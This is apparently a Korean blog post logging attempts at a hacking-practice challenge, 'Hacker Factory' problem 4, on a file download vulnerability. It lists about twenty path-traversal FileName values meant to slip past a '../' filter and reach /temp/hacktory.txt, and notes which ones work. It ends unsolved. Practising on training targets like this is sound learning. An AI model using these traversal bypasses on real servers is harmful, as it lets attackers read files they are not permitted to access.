Hacker Factory 4번문제

다운로드 취약점이라고 하니 클라이언트에서 경로를 변경하면 txt파일을 다운로드 받을 수 있을 거 같다.

 

---

1] FileName=../BestBackgroundImg.jpg 다운로드 잘 됨 

2] FileName=..../BestBackgroundImg.jpg  -> 해당 파일이 존재하지 않습니다 

지금까지 알 수 있는 것 : 1]의 ../는 필터링 된다. 
2]값 ..../에서 ..만 살아남는다 그렇기 때문에 해당 파일이 존재하지 않는다는 문구가 뜬다.

3] FileName=....//BestBackgroundImg.jpg -> 해당 파일이 존재하지 않습니다 

4] ....///BestBackgroundImg.jpg -> 해당 파일이 존재하지 않습니다 

5] ../../BestBackgroundImg.jpg -> 잘 됨 

6] ../를 필터하는게 확실해 짐 

7] ../ URL Encoding 소용 없음 

8] 더블 URL Encoding 파일 조차 알아볼 수 없음 

9] .../.././BestBackgroundImg.jpg 이건 해당 파일이 존재하지 않습니다가 떠야 함 ../BestBackgroundImg.jpg이므로 
그렇지 잘 뜬다. 

그러면 이제 최상위 디렉터리가 어디쯤인지 체크해보자.

10] ..././..././..././..././..././..././temp/hacktory.txt

11] 필터가 ./도 되네 아니지.. ./는 필요가없지 

12] ...//./...//...//./...//...//./...//...//./...//...//./...//...//./...//...//./...//temp/hacktory.txt

13] ..//../../../../../../BestBackgroundImg.jpg  downloaded

14] ..//../../../../../../BestBackgroundImg.jpg/../../../

15] .../..//../../../../../../BestBackgroundImg.jpg downloaded

16] ..../..//../../../../../../BestBackgroundImg.jpg x 

17] ..../..//BestBackgroundImg.jpg bypass succeed 

18] ..../..//..../..//..../..//..../..//..../..//..../..//temp/hacktory.txt  

19] BestBack/groundImg.jpg x 

20] BestBack../groundImg.jpg downloaded 

왜 안되냐..?? ^.^;; 

 

attachment를 보면 ../가 잘됨을 확인할 수 있다.

 

여기보면 Best어쩌고 jpg가 잘 다운로드 됨을 확인할 수 있다... 

다운 잘 된다아 ~

 

으음... 왜 /temp/hacktory.txt 안되냐